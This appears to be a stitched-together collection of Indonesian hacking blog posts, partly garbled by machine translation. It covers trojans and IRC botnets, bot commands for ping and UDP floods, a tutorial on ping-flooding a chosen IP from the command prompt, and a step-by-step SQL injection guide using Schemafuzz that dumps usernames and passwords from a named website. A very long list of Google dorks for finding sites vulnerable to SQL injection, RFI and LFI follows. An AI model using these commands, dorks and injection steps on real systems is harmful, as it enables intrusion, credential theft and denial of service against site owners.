Jadi, bagaimana mesin ini dikompromikan? Cara yang paling umum adalah melalui kuda trojan.Jika trojan dimuat pada mesin Anda, itu akan terus berjalan kecuali Anda mengambil tindakan tertentu untuk menghentikannya. Program-program ini biasanya didownload oleh pengguna karena mereka umumnya menyamar sebagai sesuatu yang lain. Ada BANYAK program-program ini pada Kazza, eDonkey, dll sejarah, trojan pertama mudah spot. Mereka biasanya memiliki nama-nama mencurigakan dan scanner virus paling memungutnya. Beberapa trojan yang digunakan saat ini telah diberi nama dengan hati-hati untuk lulus sebagai layanan normal windows. Sebagai contoh, rundll32.exe digunakan dalam hubungannya dengan segala macam program dan jendela installer. Hacker telah mengembangkan sebuah trojan bernama RUND1L32.EXE. Perhatikan bahwa “pertama L” benar-benar merupakan satu “.” Common trojans datang dalam variasi dari Lubang Kembali, Backdoor.Trojan, Sub7 dan lain-lain.

Apa Trojan sebuah Apakah …
Apa trojan lakukan? Setelah mesin terinfeksi trojan, maka laporan “rumah.” ”Home” biasanya merupakan saluran IRC. Aku tidak akan masuk ke dalam apa IRC. Secara pribadi, Saya pikir salah satu hal terbodoh yang pernah dibuat. Bahkan memiliki beberapa RFC. Mesin lainnya terinfeksi juga akan memasuki saluran, dan hacker dikenal sebagai master “” akan mengirimkan perintah ke mesin dikompromikan dikenal sebagai “budak” atau “zombie.” Ketua memiliki kemampuan untuk mengirim banyak perintah. Banyak trojan memiliki logger kunci real-time. Ini dapat digunakan untuk merekam nama pengguna dan password apa pun termasuk bank dan account email. Namun, hacker hanya akan paling sering menggunakan budak untuk meluncurkan serangan DDoS. Hal ini dapat dilakukan dengan beberapa cara.
Ping of Death …
The ping kematian melibatkan memerintah para budak untuk mengirim perintah seperti! P4 192.168.0.1. Ini akan meluncurkan perintah yang sama yang dapat dilakukan di windows dengan mengetik ping 192.168.0.1-l 65500-n 10000. Ini, pada dasarnya, ping mesin target 192.168.0.1 terus [10.000 kali] dengan 64 KBS data. Perintah ping tidak masalah karena banyak program akan menggunakan ping awal sebelum terhubung ke sebuah host. Namun, jika hal ini dilakukan oleh mesin berganda, mesin target dapat menjadi sesak dengan kunjungan ping dan akan dapat memproses permintaan legit.
UDP Banjir …
Ketika master mengirimkan udp 207.71.92.193 9.999.999 0 perintah! Bagi budak-budak, sebuah DDoS benar akan terjadi. Perintah ini mengirimkan banjir 9.999.999 paket UDP yang sangat besar, tidak ada penundaan antara masing-masing paket. Berbeda dengan transmisi paket-paket TCP, perintah ini ditetapkan untuk memiliki “O” penundaan antara setiap paket. Ini, pada dasarnya, akan banjir target bandwidth membuatnya tidak dapat memproses permintaan legit.Serangan UDP jauh lebih buruk daripada serangan ping. Hal ini juga memerlukan lebih sedikit klien untuk melakukan kerusakan.
Menelusuri Serang …
Melacak sumber serangan tersebut bisa sangat sulit atau bahkan tidak mungkin. Sebagian besar waktu, para hacker meluncurkan serangan ini tahu apa yang mereka lakukan dan telah mengambil langkah-langkah yang tepat untuk melindungi diri mereka sendiri. Lihat telnet hacking untuk contoh.
Menghentikan Serangan DDoS …
Menghentikan serangan DDoS bisa rumit karena lalu lintas yang berasal dari berbagai sumber.Jika lalu lintas yang berasal dari satu jaringan, mudah untuk membuat aturan di router untuk secara tegas memblokir lalu lintas dari sumber tersebut. Namun, jika serangan tersebut datang dari beberapa jaringan, Anda mungkin memerlukan bantuan ISP Anda untuk mengarahkan ulang lalu lintas, membuat penyaring, atau mengubah saluran komunikasi Anda.
cara kita ddos IP orang ada berbagai macam ada yang menggunakan bot,ada yang menggunakan shell ada ada juga yang menggunakan camment prompt!!
seka…rang kita bahas aja ddos yang menggunakan comment prompt yach!!
Gimana Sih cara nge ddos Via Command Prompt,..
pertama kamu cari target,.. misalkan: Ip target 202.195.4.10
nah setelah kamu dah dapet Target,.. kemudian kamu buka command prompt dengan cara:
Klik : Start – Run – Ketikkan CMD
lalu di command prompt loe ketik: ping 202.195.4.10 -t -l 6500 dan kamu liat pingnya, ketik: ping 202.195.4.10 -t
Apa yang terjadi,.. hahah,.. breKZkzkKz…. mudahkan,.. tp inget 1 hal,.. liat bandwidth kamu,.. klo kamu kalah bandwidth bisa2 senjata makan tuan dech,.. xixixixixi,.. klo emank terjadi begitu,.. cepet2 dah kamu restart Modem,..

Hacking Database Dengan Schemafuzzy by heykhend

ini adalah teknik sql injection  yg menggunakan tool keluaran dari darkc0de yaitu Schemafuzz yg type ya menggunakan bahasa python
oiya emmmm bagi para pengguna windos kita harus install dulu ya software yang nama nya interpreter python karena sebenarnya Schemafuzz ini berjalan di linux

1. Cari dlu web yg vul terhadap SQL injection. “Gimana cara-nya mas?” tenang, blum selesai. Oke, bug SQL injc biasa-nya terdapat pada halaman news,berita, atau sejenis nya. Utk mengetahui web tsb vul atau tidak, coba gunakan single quote (’) di akhir url. Contoh: http://target.com/news.php?id=2′ << Singel quote (’) di akhir url. Nah, apabila muncul pesan error “MySQL error syntax blablabla…” berarti web tsb vul terhadap SQL injection. Paham? oke, lanjut…
2. Target kita kali ini adalah www.rayner.com/products.php?id=22 . setelah kita mendapatkan target yang vulnerable, yang harus kita cari pertama kali adalah jumlah column
a. cari jumlah column dan magic number,..
command :
schemafuzz.py – -findcol -u
Nanti akan muncul seperti ini:
disitu dapat kita lihat bahwa jumlah column nya adalah 10 dimulai dari angka 0, dan yang null adalah column ke 1,..
3. cari database name,..
command :
schemafuzz.py – -dbs -u
disini link url nya kita copykan dari out put langkah diatas yaitu darkc0de url. Yang di blok adalah nama Database-nya.
setelah kita mendapat kan nama databasenya sekarang kita liat schema table dan colum yang ada dalam database tersebut,
4. lihat table dan column,
command :
schemafuzz.py – -schema -u
jangan lupa untuk menambahkan nama database nya di depan url dengan command -D namatadabase
hasil nya akan terlihat seperti ini,

digambar terlihat jelas semua nama table dan columnnya, langkah terakhir adalah melihat semua data yang ada dalam table dan column tersebut, disini kita akan melihat data yang ada dalam table auth dengan nama column name,pass (Table No. 1)
5. lihat data dalam collum!
command :
schemafuzz.py – -dump -u
jangan lupa didepan url kita tambahkan nama database, nama table, dan nama column, dengan command -D namadatabe -T namatable -C namacolumn. Contoh : # python schemafuzz.py –dump -u http://www.rayner.com/products.php?id=22+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5,6,7,8,9 -D db2889_rayner_en -T auth -C name,pass
Yang di block adalah username dan password ^^

SQLi Dork, RFI Dork & LFI Dork untuk google by heykhend

Berikut ini adalah kumpulan SQLi Dork, SQL Injection Dork, RFI Dork, LFI Dork, Google Dork, SQL Dork, Dork SQL, Dork RFI, Dork LFI, Dork File Upload, Dork Upload, Dork SQLi, Vuln Dork, Deface Dork, Hacker Dork, Dork Hacker, Dork Cracker, Crack Dork, Cracker Dork, CSRF Dork, Exploit Dork, Remote File Dork, Inclusion Dork, Local File Dork, Vulnerability Dork, Exploit-Db Dork terlengkap dari nandaheykhen”s blog
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:Pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:opinions.php?id=
inurl:spr.php?id=
inurl:pages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurl:participant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:prod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurl:person.php?id=
inurl:productinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurl:profile_view.php?id=
inurl:category.php?id=
inurl:publications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurl:prod_info.php?id=
inurl:shop.php?do=part&id=
inurl:Productinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurl:product.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurl:produit.php?id=
inurl:pop.php?id=
inurl:shopping.php?id=
inurl:productdetail.php?id=
inurl:post.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurl:page.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurl:product_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:review.php?id=
inurl:loadpsb.php?id=
inurl:ages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurl:opinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurl:offer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=
trainers.php?id=
article.php?ID=
play_old.php?id=
declaration_more.php?decl_id=
Pageid=
games.php?id=
newsDetail.php?id=
staff_id=
historialeer.php?num=
product-item.php?id=
news_view.php?id=
humor.php?id=
communique_detail.php?id=
sem.php3?id=
opinions.php?id=
spr.php?id=
pages.php?id=
chappies.php?id=
prod_detail.php?id=
viewphoto.php?id=
view.php?id=Original source: http://www.binushacker.net
website.php?id=
hosting_info.php?id=
gery.php?id=
detail.php?ID=
publications.php?id=
Productinfo.php?id=
releases.php?id=
ray.php?id=
produit.php?id=
pop.php?id=
shopping.php?id=
productdetail.php?id=
post.php?id=
section.php?id=
theme.php?id=
page.php?id=
shredder-categories.php?id=
product_ranges_view.php?ID=
shop_category.php?id=
channel_id=
newsid=
news_display.php?getid=
ages.php?id=
clanek.php4?id=
review.php?id=
iniziativa.php?in=
curriculum.php?id=
labels.php?id=
look.php?ID=
galeri_info.php?l=
tekst.php?idt=
newscat.php?id=
newsticker_info.php?idn=
rubrika.php?idr=
offer.php?idf=
“id=” & intext:”Warning: mysql_fetch_array()
“id=” & intext:”Warning: getimagesize()
“id=” & intext:”Warning: session_start()
“id=” & intext:”Warning: mysql_num_rows()
“id=” & intext:”Warning: mysql_query()
“id=” & intext:”Warning: array_merge()
“id=” & intext:”Warning: preg_match()
“id=” & intext:”Warning: ilesize()
“id=” & intext:”Warning: filesize()
index.php?id=
buy.php?category=
article.php?ID=
play_old.php?id=
newsitem.php?num=
top10.php?cat=
historialeer.php?num=
reagir.php?num=
Stray-Questions-View.php?num=
forum_bds.php?num=
game.php?id=
view_product.php?id=
sw_comment.php?id=
news.php?id=
avd_start.php?avd=
event.php?id=
sql.php?id=
news_view.php?id=
select_biblio.php?id=
humor.php?id=
ogl_inet.php?ogl_id=
fiche_spectacle.php?id=
communique_detail.php?id=
sem.php3?id=
kategorie.php4?id=
faq2.php?id=
show_an.php?id=
preview.php?id=
loadpsb.php?id=
opinions.php?id=
spr.php?id=
announce.php?id=
participant.php?id=
download.php?id=
main.php?id=
review.php?id=
chappies.php?id=
read.php?id=
prod_detail.php?id=
article.php?id=
person.php?id=
productinfo.php?id=
showimg.php?id=
view.php?id=
website.php?id=
hosting_info.php?id=
gery.php?id=
rub.php?idr=
view_faq.php?id=
artikelinfo.php?id=
detail.php?ID=
index.php?=
profile_view.php?id=
category.php?id=
publications.php?id=
fellows.php?id=
downloads_info.php?id=
prod_info.php?id=
shop.php?do=part&id=
collectionitem.php?id=
band_info.php?id=
product.php?id=
releases.php?id=
ray.php?id=
produit.php?id=
pop.php?id=
shopping.php?id=
productdetail.php?id=
post.php?id=
viewshowdetail.php?id=
clubpage.php?id=
memberInfo.php?id=
section.php?id=
theme.php?id=
page.php?id=
shredder-categories.php?id=
tradeCategory.php?id=
product_ranges_view.php?ID=
shop_category.php?id=
transcript.php?id=
channel_id=
item_id=
newsid=
trainers.php?id=
news-full.php?id=
news_display.php?getid=
index2.php?option=
readnews.php?id=
newsone.php?id=
product-item.php?id=
pages.php?id=
clanek.php4?id=
viewapp.php?id=
viewphoto.php?id=
galeri_info.php?l=
iniziativa.php?in=
curriculum.php?id=
labels.php?id=
story.php?id=
look.php?ID=
aboutbook.php?id=
“id=” & intext:”Warning: mysql_fetch_assoc()
“id=” & intext:”Warning: is_writable()
“id=” & intext:”Warning: Unknown()
“id=” & intext:”Warning: mysql_result()
“id=” & intext:”Warning: pg_exec()
“id=” & intext:”Warning: require()
buy.php?category=
pageid=
page.php?file=
show.php?id=
newsitem.php?num=
readnews.php?id=
top10.php?cat=
reagir.php?num=
Stray-Questions-View.php?num=
forum_bds.php?num=
game.php?id=
view_product.php?id=
sw_comment.php?id=
news.php?id=
avd_start.php?avd=
event.php?id=
sql.php?id=
select_biblio.php?id=
ogl_inet.php?ogl_id=
fiche_spectacle.php?id=
kategorie.php4?id=
faq2.php?id=
show_an.php?id=
loadpsb.php?id=
announce.php?id=
participant.php?id=
download.php?id=
article.php?id=
person.php?id=
productinfo.php?id=
showimg.php?id=
rub.php?idr=
view_faq.php?id=
artikelinfo.php?id=
index.php?=
profile_view.php?id=
category.php?id=
fellows.php?id=
downloads_info.php?id=
prod_info.php?id=
shop.php?do=part&id=
collectionitem.php?id=
band_info.php?id=
product.php?id=
viewshowdetail.php?id=
clubpage.php?id=
memberInfo.php?id=
tradeCategory.php?id=
transcript.php?id=
item_id=
news-full.php?id=
aboutbook.php?id=
preview.php?id=
material.php?id=
read.php?id=
viewapp.php?id=
story.php?id=
newsone.php?id=
rubp.php?idr=
art.php?idm=
title.php?id=
index1.php?modo=
include.php?*[*]*=
nota.php?pollname=
index3.php?p=
padrao.php?pre=
home.php?pa=
main.php?type=
sitio.php?start=
indishell.in
*.php?include=
general.php?xlink=
show.php?go=
nota.php?ki=
down*.php?oldal=
layout.php?disp=
enter.php?chapter=
base.php?incl=
enter.php?mod=
show.php?corpo=
head.php?*[*]*=
info.php?strona=
template.php?str=
main.php?doshow=
view.php?*[*]*=
index.php?to=
page.php?cmd=
view.php?b=
info.php?option=
show.php?x=
template.php?texto=
index3.php?ir=
print.php?chapter=
file.php?inc=
file.php?cont=
view.php?cmd=
include.php?chapter=
path.php?my=
principal.php?param=
general.php?menue=
index1.php?b=
info.php?chapter=
nota.php?chapter=
general.php?include=
start.php?addr=
index1.php?qry=
index1.php?loc=
page.php?addr=
index1.php?dir=
principal.php?pr=
press.php?seite=
head.php?cmd=
home.php?sec=
home.php?category=
standard.php?cmd=
mod*.php?thispage=
base.php?to=
view.php?choix=
base.php?panel=
template.php?mod=
info.php?j=
blank.php?pref=
sub*.php?channel=
standard.php?in=
general.php?cmd=
pagina.php?panel=
template.php?where=
path.php?channel=
gery.php?seccion=
page.php?tipo=
sitio.php?rub=
pagina.php?u=
file.php?ir=
*inc*.php?sivu=
path.php?start=
page.php?chapter=
home.php?recipe=
enter.php?pname=
layout.php?path=
print.php?open=
mod*.php?channel=
down*.php?phpbb_root_path=
*inc*.php?str=
gery.php?phpbb_root_path=
include.php?middlePart=
sub*.php?destino=
info.php?read=
home.php?sp=
main.php?strona=
sitio.php?get=
sitio.php?index=
index3.php?option=
enter.php?a=
main.php?second=
print.php?pname=
blank.php?itemnav=
blank.php?pagina=
index1.php?d=
down*.php?where=
*inc*.php?include=
path.php?pre=
home.php?loader=
start.php?eval=
index.php?disp=
head.php?mod=
sitio.php?section=
nota.php?doshow=
home.php?seite=
home.php?a=
page.php?url=
pagina.php?left=
layout.php?c=
principal.php?goto=
standard.php?base_dir=
home.php?where=
page.php?sivu=
*inc*.php?adresa=
padrao.php?str=
include.php?my=
show.php?home=
index.php?load=
index3.php?rub=
sub*.php?str=
start.php?index=
nota.php?mod=
sub*.php?mid=
index1.php?*[*]*=
pagina.php?oldal=
padrao.php?loc=
padrao.php?rub=
page.php?incl=
gery.php?disp=
nota.php?oldal=
include.php?u=
principal.php?pagina=
print.php?choix=
head.php?filepath=
include.php?corpo=
sub*.php?action=
head.php?pname=
press.php?dir=
show.php?xlink=
file.php?left=
nota.php?destino=
general.php?module=
index3.php?redirect=
down*.php?param=
default.php?ki=
padrao.php?h=
padrao.php?read=
mod*.php?cont=
index1.php?l=
down*.php?pr=
gery.php?viewpage=
template.php?load=
nota.php?pr=
padrao.php?destino=
index2.php?channel=
principal.php?opcion=
start.php?str=
press.php?*[*]*=
index.php?ev=
pagina.php?pre=
nota.php?content=
include.php?adresa=
sitio.php?t=
index.php?sivu=
principal.php?q=
path.php?ev=
print.php?module=
index.php?loc=
nota.php?basepath=
padrao.php?tipo=
index2.php?in=
principal.php?eval=
file.php?qry=
info.php?t=
enter.php?play=
general.php?var=
principal.php?s=
standard.php?pagina=
standard.php?subject=
base.php?second=
head.php?inc=
pagina.php?basepath=
main.php?pname=
*inc*.php?modo=
include.php?goto=
file.php?pg=
head.php?g=
general.php?header=
start.php?*root*=
enter.php?pref=
index3.php?open=
start.php?module=
main.php?load=
enter.php?pg=
padrao.php?redirect=
pagina.php?my=
gery.php?pre=
enter.php?w=
info.php?texto=
enter.php?open=
base.php?rub=
gery.php?*[*]*=
include.php?cmd=
standard.php?dir=
layout.php?page=
index3.php?pageweb=
include.php?numero=
path.php?destino=
index3.php?home=
default.php?seite=
path.php?eval=
base.php?choix=
template.php?cont=
info.php?pagina=
default.php?x=
default.php?option=
gery.php?ki=
down*.php?second=
blank.php?path=
pagina.php?v=
file.php?pollname=
index3.php?var=
layout.php?goto=
pagina.php?incl=
home.php?action=
include.php?oldal=
indishell.in
print.php?left=
print.php?u=
nota.php?v=
home.php?str=
press.php?panel=
page.php?mod=
default.php?param=
down*.php?texto=
mod*.php?dir=
view.php?where=
blank.php?subject=
path.php?play=
base.php?l=
index2.php?rub=
general.php?opcion=
layout.php?xlink=
padrao.php?name=
pagina.php?nivel=
default.php?oldal=
template.php?k=
main.php?chapter=
layout.php?chapter=
layout.php?incl=
include.php?url=
base.php?sivu=
index.php?link=
sub*.php?cont=
info.php?oldal=
general.php?rub=
default.php?str=
head.php?ev=
sub*.php?path=
view.php?page=
main.php?j=
index2.php?basepath=
gery.php?qry=
main.php?url=
default.php?incl=
show.php?redirect=
index1.php?pre=
general.php?base_dir=
start.php?in=
show.php?abre=
index1.php?home=
home.php?ev=
index2.php?ki=
base.php?pag=
default.php?ir=
general.php?qry=
index2.php?home=
press.php?nivel=
enter.php?pr=
blank.php?loader=
start.php?cmd=
padrao.php?d=
sitio.php?recipe=
principal.php?read=
standard.php?showpage=
main.php?pg=
page.php?panel=
press.php?addr=
template.php?s=
main.php?tipo=
*inc*.php?ev=
padrao.php?page=
show.php?thispage=
home.php?secao=
main.php?start=
enter.php?mid=
press.php?id=
main.php?inc=
index3.php?cmd=
index.php?pname=
press.php?subject=
include.php?sec=
index3.php?xlink=
general.php?texto=
index3.php?go=
index.php?cmd=
index3.php?disp=
index3.php?left=
sub*.php?middle=
show.php?modo=
index1.php?pagina=
head.php?left=
enter.php?phpbb_root_path=
show.php?z=
start.php?basepath=
blank.php?strona=
template.php?y=
page.php?where=
layout.php?category=
index1.php?my=
principal.php?phpbb_root_path=
nota.php?channel=
page.php?choix=
start.php?xlink=
home.php?k=
standard.php?phpbb_root_path=
principal.php?middlePart=
mod*.php?m=
index.php?recipe=
template.php?path=
pagina.php?dir=
sitio.php?abre=
index1.php?recipe=
blank.php?page=
sub*.php?category=
*inc*.php?body=
enter.php?middle=
home.php?path=
down*.php?pre=
base.php?w=
main.php?path=
nota.php?ir=
press.php?link=
gery.php?pollname=
down*.php?open=
down*.php?pageweb=
default.php?eval=
view.php?showpage=
show.php?get=
sitio.php?tipo=
layout.php?cont=
default.php?destino=
padrao.php?seccion=
down*.php?r=
main.php?param=
standard.php?e=
down*.php?in=
nota.php?include=
sitio.php?secao=
print.php?my=
general.php?abre=
general.php?link=
default.php?id=
standard.php?panel=
show.php?channel=
enter.php?r=
index3.php?phpbb_root_path=
gery.php?where=
head.php?middle=
sub*.php?load=
gery.php?sp=
show.php?chapter=
sub*.php?b=
general.php?adresa=
print.php?goto=
sub*.php?sp=
template.php?doshow=
padrao.php?base_dir=
index2.php?my=
include.php?w=
start.php?op=
main.php?section=
view.php?header=
layout.php?menue=
head.php?y=
sub*.php?content=
show.php?type=
base.php?id=
mod*.php?qry=
default.php?strona=
sitio.php?chapter=
gery.php?index=
nota.php?h=
page.php?oldal=
enter.php?panel=
blank.php?t=
start.php?pollname=
sub*.php?module=
enter.php?thispage=
mod*.php?index=
sitio.php?r=
sub*.php?play=
index2.php?doshow=
index2.php?chapter=
show.php?path=
gery.php?to=
info.php?base_dir=
gery.php?abre=
gery.php?pag=
view.php?channel=
default.php?mod=
index.php?op=
general.php?pre=
padrao.php?type=
template.php?pag=
standard.php?pre=
blank.php?ref=
down*.php?z=
general.php?inc=
home.php?read=
pagina.php?section=
default.php?basepath=
index.php?pre=
sitio.php?pageweb=
base.php?seite=
*inc*.php?j=
index2.php?filepath=
file.php?type=
index1.php?oldal=
index2.php?second=
index3.php?sekce=
info.php?filepath=
base.php?opcion=
path.php?category=
index3.php?start=
start.php?rub=
*inc*.php?i=
blank.php?pre=
general.php?channel=
index2.php?OpenPage=
page.php?section=
mod*.php?middle=
index1.php?goFile=
blank.php?action=
principal.php?loader=
sub*.php?op=
main.php?addr=
start.php?mid=
gery.php?secao=
pagina.php?tipo=
index.php?w=
head.php?where=
principal.php?tipo=
press.php?loader=
gery.php?showpage=
gery.php?go=
enter.php?start=
press.php?lang=
general.php?p=
index.php?sekce=
index2.php?get=
sitio.php?go=
include.php?cont=
sub*.php?where=
index3.php?index=
path.php?recipe=
info.php?loader=
print.php?sp=
page.php?phpbb_root_path=
path.php?body=
principal.php?menue=
print.php?cont=
pagina.php?z=
default.php?mid=
blank.php?xlink=
sub*.php?oldal=
general.php?b=
include.php?left=
print.php?sivu=
press.php?OpenPage=
default.php?cont=
general.php?pollname=
template.php?nivel=
enter.php?page=
file.php?middle=
standard.php?str=
gery.php?get=
main.php?v=
down*.php?subject=
enter.php?sivu=
path.php?option=
index.php?strona=
index1.php?choix=
index2.php?f=
press.php?destino=
pagina.php?channel=
principal.php?b=
home.php?include=
head.php?numero=
general.php?ref=
main.php?dir=
gery.php?cont=
principal.php?type=
file.php?param=
default.php?secao=
path.php?pageweb=
info.php?r=
base.php?phpbb_root_path=
main.php?itemnav=
view.php?pg=
pagina.php?choix=
default.php?itemnav=
index2.php?cmd=
layout.php?url=
index.php?path=
index1.php?second=
start.php?modo=
index1.php?get=
index3.php?my=
sub*.php?left=
print.php?inc=
view.php?type=
path.php?*[*]*=
base.php?adresa=
index3.php?oldal=
standard.php?body=
base.php?path=
principal.php?strona=
info.php?l=
template.php?left=
head.php?loc=
page.php?ir=
print.php?path=
down*.php?path=
sitio.php?opcion=
pagina.php?category=
press.php?menu=
index2.php?pref=
sitio.php?incl=
show.php?ki=
index3.php?x=
page.php?strona=
*inc*.php?open=
index3.php?secao=
standard.php?*[*]*=
template.php?basepath=
standard.php?goFile=
index2.php?ir=
file.php?modo=
gery.php?itemnav=
main.php?oldal=
down*.php?showpage=
start.php?destino=
blank.php?rub=
path.php?ir=
layout.php?var=
index1.php?texto=
start.php?pg=
index1.php?showpage=
info.php?go=
path.php?load=
index3.php?abre=
blank.php?where=
info.php?start=
page.php?secao=
nota.php?pag=
nota.php?second=
index2.php?to=
standard.php?name=
start.php?strona=
mod*.php?numero=
press.php?home=
info.php?z=
mod*.php?path=
blank.php?base_dir=
base.php?texto=
nota.php?secc=
index.php?tipo=
index.php?goto=
print.php?pag=
view.php?secao=
general.php?strona=
show.php?my=
page.php?e=
padrao.php?index=
gery.php?thispage=
start.php?base_dir=
default.php?tipo=
gery.php?panel=
standard.php?ev=
standard.php?destino=
general.php?middle=
main.php?basepath=
standard.php?q=
index1.php?tipo=
mod*.php?choix=
template.php?ir=
show.php?adresa=
general.php?mid=
index3.php?adresa=
pagina.php?sec=
template.php?secao=
home.php?w=
general.php?content=
sub*.php?recipe=
main.php?category=
enter.php?viewpage=
main.php?ir=
show.php?pageweb=
principal.php?ir=
default.php?pageweb=
index.php?oldal=
head.php?d=
gery.php?mid=
index.php?type=
standard.php?j=
show.php?oldal=
enter.php?link=
enter.php?content=
blank.php?filepath=
standard.php?channel=
base.php?*[*]*=
info.php?incl=
down*.php?include=
press.php?modo=
file.php?choix=
press.php?type=
blank.php?goto=
index3.php?showpage=
principal.php?subject=
start.php?chapter=
show.php?r=
pagina.php?thispage=
general.php?chapter=
page.php?base_dir=
page.php?qry=
show.php?incl=
page.php?*[*]*=
main.php?h=
file.php?seccion=
default.php?pre=
principal.php?index=
principal.php?inc=
home.php?z=
pagina.php?in=
show.php?play=
nota.php?subject=
default.php?secc=
default.php?loader=
padrao.php?var=
mod*.php?b=
default.php?showpage=
press.php?channel=
pagina.php?ev=
sitio.php?name=
page.php?option=
press.php?mid=
down*.php?corpo=
view.php?get=
print.php?thispage=
principal.php?home=
show.php?param=
standard.php?sivu=
index3.php?panel=
include.php?play=
path.php?cmd=
file.php?sp=
template.php?section=
view.php?str=
blank.php?left=
nota.php?lang=
path.php?sivu=
main.php?e=
default.php?ref=
start.php?seite=
default.php?inc=
print.php?disp=
home.php?h=
principal.php?loc=
index3.php?sp=
gery.php?var=
sub*.php?base_dir=
path.php?middle=
pagina.php?str=
base.php?play=
base.php?v=
sitio.php?sivu=
unknown.soldier
main.php?r=
file.php?nivel=
start.php?sivu=
template.php?c=
general.php?second=
sub*.php?mod=
home.php?loc=
head.php?corpo=
standard.php?op=
index2.php?inc=
info.php?pref=
base.php?basepath=
print.php?basepath=
*inc*.php?m=
base.php?home=
layout.php?strona=
padrao.php?url=
sitio.php?oldal=
pagina.php?read=
index1.php?go=
standard.php?s=
page.php?eval=
index.php?j=
pagina.php?pr=
start.php?secao=
template.php?*[*]*=
nota.php?get=
index3.php?link=
home.php?e=
gery.php?name=
nota.php?eval=
sub*.php?abre=
index2.php?load=
principal.php?in=
view.php?load=
mod*.php?action=
default.php?p=
head.php?c=
template.php?viewpage=
view.php?mid=
padrao.php?addr=
view.php?go=
file.php?basepath=
home.php?pre=
include.php?goFile=
layout.php?play=
index1.php?subject=
info.php?middlePart=
down*.php?pg=
sub*.php?body=
index.php?option=
sub*.php?chapter=
default.php?t=
head.php?opcion=
nota.php?panel=
sitio.php?left=
show.php?include=
pagina.php?start=
head.php?choix=
index3.php?tipo=
index3.php?choix=
down*.php?channel=
base.php?pa=
nota.php?sekce=
show.php?l=
show.php?index=
blank.php?url=
start.php?thispage=
nota.php?play=
show.php?second=
enter.php?include=
principal.php?middle=
main.php?where=
padrao.php?link=
path.php?strona=
index3.php?read=
mod*.php?module=
standard.php?viewpage=
standard.php?pr=
*inc*.php?showpage=
pagina.php?ref=
path.php?pname=
padrao.php?mid=
info.php?eval=
include.php?path=
page.php?subject=
sub*.php?qry=
head.php?module=
nota.php?opcion=
head.php?abre=
base.php?str=
home.php?body=
gery.php?module=
head.php?sivu=
page.php?inc=
pagina.php?header=
mod*.php?v=
home.php?doshow=
padrao.php?n=
index1.php?chapter=
padrao.php?basepath=
index.php?r=
index3.php?seccion=
sitio.php?mid=
index.php?where=
general.php?type=
pagina.php?goto=
page.php?pa=
default.php?menue=
main.php?goto=
index1.php?abre=
info.php?seccion=
index2.php?pa=
layout.php?pageweb=
nota.php?disp=
index1.php?body=
default.php?nivel=
show.php?header=
down*.php?pag=
start.php?tipo=
standard.php?w=
index.php?open=
blank.php?menu=
general.php?nivel=
padrao.php?nivel=
*inc*.php?addr=
index.php?var=
home.php?redirect=
*inc*.php?link=
*inc*.php?incl=
padrao.php?corpo=
down*.php?url=
enter.php?goto=
down*.php?addr=
sub*.php?j=
principal.php?f=
sub*.php?menue=
index2.php?section=
general.php?my=
head.php?loader=
general.php?goto=
include.php?dir=
start.php?header=
blank.php?in=
base.php?name=
nota.php?goFile=
head.php?base_dir=
mod*.php?recipe=
press.php?pr=
padrao.php?*[*]*=
layout.php?opcion=
print.php?rub=
index.php?pr=
general.php?seite=
pagina.php?numero=
*inc*.php?pg=
nota.php?rub=
view.php?seite=
pagina.php?recipe=
index.php?pref=
page.php?action=
page.php?ev=
